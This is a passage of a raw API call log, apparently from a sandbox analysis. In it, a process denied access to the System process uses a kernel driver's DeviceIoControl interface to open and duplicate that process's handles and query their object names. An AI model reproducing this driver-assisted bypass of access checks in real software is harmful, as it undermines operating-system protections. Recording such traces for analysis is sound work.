lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0239.646] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.646] PsAcquireProcessExitSynchronization () returned 0x0 [0239.646] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880053c85d0) [0239.646] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80018b5f40, HandleInformation=0x0) returned 0x0 [0239.646] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.646] PsReleaseProcessExitSynchronization () returned 0x2 [0239.646] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0239.646] ObQueryNameString (in: Object=0xfffffa80018b5f40, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.646] ObfDereferenceObject (Object=0xfffffa80018b5f40) returned 0xc [0239.646] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.646] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.646] CloseHandle (hObject=0xc4) returned 1 [0239.646] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0xc4 [0239.646] GetCurrentProcess () returned 0xffffffffffffffff [0239.646] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0239.646] CloseHandle (hObject=0xc4) returned 1 [0239.647] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.647] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x88) returned 0x1ecb50 [0239.647] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x1ecb50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x1ecb50, ReturnLength=0x0) returned 0x0 [0239.647] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ecb50 | out: hHeap=0x1b0000) returned 1 [0239.647] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.647] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0239.647] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.647] PsAcquireProcessExitSynchronization () returned 0x0 [0239.647] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0239.647] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a004498db0, HandleInformation=0x0) returned 0x0 [0239.647] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.647] PsReleaseProcessExitSynchronization () returned 0x2 [0239.647] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x16e [0239.647] ObQueryNameString (in: Object=0xfffff8a004498db0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.647] ObfDereferenceObject (Object=0xfffff8a004498db0) returned 0x3 [0239.647] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.647] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.647] CloseHandle (hObject=0xc8) returned 1 [0239.647] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.647] GetLastError () returned 0x5 [0239.647] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0239.648] ZwOpenProcess (in: ProcessHandle=0xfffffa800215c540, DesiredAccess=0x10000000, ObjectAttributes=0xfffff880053c8688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880053c8678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa800215c540*=0xc8) returned 0x0 [0239.648] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.648] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0239.648] ZwOpenProcess (in: ProcessHandle=0xfffff880053c85f0, DesiredAccess=0x40, ObjectAttributes=0xfffff880053c8608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880053c85f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff880053c85f0*=0xffffffff80000588) returned 0x0 [0239.648] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000588, SourceHandle=0x42c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa800215c540, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa800215c540*=0xc4) returned 0x0 [0239.648] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0239.648] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.648] CloseHandle (hObject=0xc8) returned 1 [0239.648] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.648] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.648] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.648] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.648] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.648] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.648] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.648] PsAcquireProcessExitSynchronization () returned 0x0 [0239.648] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.649] ObReferenceObjectByHandle (in: Handle=0xffffffff8000042c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039086d0, HandleInformation=0x0) returned 0x0 [0239.649] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.649] PsReleaseProcessExitSynchronization () returned 0x2 [0239.649] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.649] ObQueryNameString (in: Object=0xfffffa80039086d0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.649] ObfDereferenceObject (Object=0xfffffa80039086d0) returned 0x5 [0239.649] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.649] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.649] CloseHandle (hObject=0xc4) returned 1 [0239.649] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.649] GetLastError () returned 0x5 [0239.649] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0239.649] ZwOpenProcess (in: ProcessHandle=0xfffffa800215c540, DesiredAccess=0x10000000, ObjectAttributes=0xfffff880053c8688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880053c8678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa800215c540*=0xc4) returned 0x0 [0239.649] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.649] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0239.649] ZwOpenProcess (in: ProcessHandle=0xfffff880053c85f0, DesiredAccess=0x40, ObjectAttributes=0xfffff880053c8608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880053c85f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff880053c85f0*=0xffffffff80000588) returned 0x0 [0239.649] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000588, SourceHandle=0x428, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa800215c540, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa800215c540*=0xc8) returned 0x0 [0239.649] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0239.650] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.650] CloseHandle (hObject=0xc4) returned 1 [0239.650] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.650] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1eeb50 [0239.650] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x1eeb50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1eeb50, ReturnLength=0x0) returned 0x0 [0239.650] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1eeb50 | out: hHeap=0x1b0000) returned 1 [0239.650] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.650] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.650] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.650] PsAcquireProcessExitSynchronization () returned 0x0 [0239.650] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.650] ObReferenceObjectByHandle (in: Handle=0xffffffff80000428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028d63f0, HandleInformation=0x0) returned 0x0 [0239.650] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.650] PsReleaseProcessExitSynchronization () returned 0x2 [0239.650] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.650] ObQueryNameString (in: Object=0xfffffa80028d63f0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.650] ObfDereferenceObject (Object=0xfffffa80028d63f0) returned 0x3 [0239.650] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.651] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.651] CloseHandle (hObject=0xc8) returned 1 [0239.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.651] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.651] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.651] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.651] PsAcquireProcessExitSynchronization () returned 0x0 [0239.651] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.651] ObReferenceObjectByHandle (in: Handle=0xffffffff80000044, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80071ff050, HandleInformation=0x0) returned 0x0 [0239.651] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.651] PsReleaseProcessExitSynchronization () returned 0x2 [0239.651] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.651] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.651] ObfDereferenceObject (Object=0xfffffa80071ff050) returned 0x1 [0239.651] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.651] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.651] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.651] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.651] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.652] PsAcquireProcessExitSynchronization () returned 0x0 [0239.652] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.652] ObReferenceObjectByHandle (in: Handle=0xffffffff8000004c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8006c4d050, HandleInformation=0x0) returned 0x0 [0239.652] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.652] PsReleaseProcessExitSynchronization () returned 0x2 [0239.652] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.652] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.652] ObfDereferenceObject (Object=0xfffffa8006c4d050) returned 0x1 [0239.652] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.652] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.652] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.652] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.652] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.652] PsAcquireProcessExitSynchronization () returned 0x0 [0239.652] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.652] ObReferenceObjectByHandle (in: Handle=0xffffffff80000050, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80071c6f20, HandleInformation=0x0) returned 0x0 [0239.652] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.652] PsReleaseProcessExitSynchronization () returned 0x2 [0239.652] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.652] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.652] ObfDereferenceObject (Object=0xfffffa80071c6f20) returned 0x1 [0239.652] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.653] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.653] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.653] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.653] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.653] PsAcquireProcessExitSynchronization () returned 0x0 [0239.653] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.653] ObReferenceObjectByHandle (in: Handle=0xffffffff80000054, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8005df9050, HandleInformation=0x0) returned 0x0 [0239.653] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.653] PsReleaseProcessExitSynchronization () returned 0x2 [0239.653] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.653] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.653] ObfDereferenceObject (Object=0xfffffa8005df9050) returned 0x1 [0239.653] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.653] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.653] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.653] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.653] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.653] PsAcquireProcessExitSynchronization () returned 0x0 [0239.653] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.653] ObReferenceObjectByHandle (in: Handle=0xffffffff80000058, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8005dff050, HandleInformation=0x0) returned 0x0 [0239.653] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.653] PsReleaseProcessExitSynchronization () returned 0x2 [0239.654] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.654] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.654] ObfDereferenceObject (Object=0xfffffa8005dff050) returned 0x1 [0239.654] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.654] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.654] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.654] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.654] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.654] PsAcquireProcessExitSynchronization () returned 0x0 [0239.654] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.654] ObReferenceObjectByHandle (in: Handle=0xffffffff8000005c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80059fd1f0, HandleInformation=0x0) returned 0x0 [0239.654] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.654] PsReleaseProcessExitSynchronization () returned 0x2 [0239.654] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.654] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.654] ObfDereferenceObject (Object=0xfffffa80059fd1f0) returned 0x1 [0239.654] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.654] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.654] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.654] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.654] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.654] PsAcquireProcessExitSynchronization () returned 0x0 [0239.655] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.655] ObReferenceObjectByHandle (in: Handle=0xffffffff80000060, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80053b7050, HandleInformation=0x0) returned 0x0 [0239.655] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.655] PsReleaseProcessExitSynchronization () returned 0x2 [0239.655] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.655] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.655] ObfDereferenceObject (Object=0xfffffa80053b7050) returned 0x1 [0239.655] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.655] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.655] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.655] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.655] PsLookupProcessByProcessId (in: 